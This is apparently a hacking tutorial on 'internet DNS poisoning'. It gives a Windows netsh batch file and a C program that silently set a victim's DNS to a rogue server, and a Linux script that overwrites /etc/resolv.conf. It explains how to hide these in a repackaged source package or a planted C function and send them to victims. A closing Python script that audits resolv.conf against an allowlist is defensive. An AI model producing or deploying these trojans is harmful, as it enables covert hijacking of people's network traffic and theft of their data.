DNS Poisoning Tutorial – 2 | Internet DNS Poisoning

Following is our second tutorial on DNS Poisoning: Internet DNS Poisoning, also known as Remote DNS Poisoning. This type of DNS poisoning can be carried out against a single victim or many, and no matter where in the world the victim is, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you will have to set up a rogue DNS server somewhere with a static IP address, and note that it must be in working condition. The methods of poisoning differ between Windows and Linux systems, but both rely on the same entity: a Trojan file.
Here I'll show you how to create DNS poisoning Trojans; all you have to do is vector them.
For Windows:
To poison a victim's DNS you must know the name of his/her network interface, or the name he/she has set for the internet connection. This is a precondition for poisoning the victim's DNS; if you don't know the value, use the default "Local Area Connection". Now let's create a DNS spoofing Trojan batch file. Type the following line in Notepad and save it with any name and a .bat extension.
netsh interface ip set dns "Local Area Connection" static 115.98.23.45
The above command sets the victim's DNS server to 115.98.23.45; you can replace "Local Area Connection" with the name of the interface or connection if you know it, otherwise go with the default. Now send that file to the victim to poison his/her DNS entries. If you don't want to send a .bat file because the victim might suspect it, you can create an executable by compiling the following C program.
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* the quotes around the connection name must be escaped inside the C string literal */
    char *str = "netsh interface ip set dns \"Local Area Connection\" static 115.98.23.45";
    system(str);
    return 0;
}
Read Trojan Software Vectoring to learn how to fool the victim into executing your Trojan.
For Linux And UNIX:
Linux and UNIX systems store their DNS entries in the file /etc/resolv.conf; changing the entries in this file lets you poison DNS on Linux and UNIX systems. Now get the IP address of a working DNS server and the IP address of the rogue DNS server you set up. Suppose the rogue DNS server's IP address is 115.98.23.45 and the real DNS server's is 117.98.23.48. Then type the following commands in a text file and save it with a .sh extension (for example change.sh).
echo "nameserver 115.98.23.45" > /etc/resolv.conf
echo "nameserver 117.98.23.48" >> /etc/resolv.conf
Now all you have to do is vector this file to the victim. To vector it, get the source code installation package of some interesting software from the internet, one your victim can't resist installing on his/her system. Extract it, find a shell script in it, place change.sh in that folder, open the target shell script in a text editor, and before it ends add the following commands:
chmod +x change.sh
./change.sh
Pack it again and send it to your victim for installation; once he/she installs the software from your source code, he/she will be infected. Sometimes it is difficult to find a shell script in a package, but what is not difficult to find is a C source file. So if you have trouble with the above method, find a C source file with several functions in it and add the following new function to it.
/* requires #include <stdlib.h> for system(); the inner quotes are escaped inside the C string literals */
void change12345(void)
{
    char *str;
    str = "echo \"nameserver 115.98.23.45\" > /etc/resolv.conf";
    system(str);
    str = "echo \"nameserver 117.98.23.48\" >> /etc/resolv.conf";
    system(str);
    return;
}
And call this function from any other function before it returns. Pack the files again and send them to your victim; your code will execute every time the victim launches that program.
Note that the above exploit codes are really very basic; you can modify them to your needs, and if you find them difficult to understand, please get your hands on programming. Even with basic programming knowledge you can write your own exploit codes. Please read the books section to see which books I recommend for getting started with programming.
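Both methods above work by silently rewriting the host's resolver configuration, so the defensive counterpart is a periodic audit of the configured nameservers against an allowlist. The following Python script is an added example written for this page, not code from the original post: it parses resolv.conf text (comments, search/options lines and IPv6 entries handled), reports every nameserver not on the allowlist, and preserves order because the resolver sends queries to the first listed server, which is exactly where the rogue entry is placed above. The sample file content is constructed from the addresses used in this tutorial; the same allowlist comparison applies to the Windows setting changed by netsh.

```python
"""Audit a host's resolver configuration against an allowlist of DNS servers."""
import ipaddress
from pathlib import Path

# Constructed sample: resolv.conf after the rewrite described above, with the
# rogue server listed first and the legitimate one second so lookups keep working.
SAMPLE_RESOLV_CONF = """# Generated by NetworkManager
search corp.example
nameserver 115.98.23.45
nameserver 117.98.23.48
options timeout:2
"""

# Assumed allowlist for the sample: only the real DNS server from the tutorial.
ALLOWED_SERVERS = ["117.98.23.48"]


def parse_nameservers(resolv_text):
    """Return the nameserver entries in the order the resolver will try them."""
    servers = []
    for raw in resolv_text.splitlines():
        # resolv.conf treats '#' and ';' as comment introducers
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                servers.append(str(ipaddress.ip_address(parts[1])))  # normalise
            except ValueError:
                servers.append(parts[1])  # malformed address: keep it so it gets flagged
    return servers


def audit_nameservers(servers, allowlist):
    """Return the configured servers that are not on the allowlist, query order preserved."""
    allowed = {str(ipaddress.ip_address(a)) for a in allowlist}
    return [s for s in servers if s not in allowed]


def audit_resolv_conf(path="/etc/resolv.conf", allowlist=ALLOWED_SERVERS):
    """Audit the live file; a non-empty result means the resolver has been tampered with."""
    return audit_nameservers(parse_nameservers(Path(path).read_text()), allowlist)


if __name__ == "__main__":
    rogue = audit_nameservers(parse_nameservers(SAMPLE_RESOLV_CONF), ALLOWED_SERVERS)
    print("unexpected nameservers:", rogue)  # prints ['115.98.23.45']
```

Run with a real allowlist as a cron job or as an audit rule and alert on any non-empty result; the first flagged entry is the one receiving all of the host's queries.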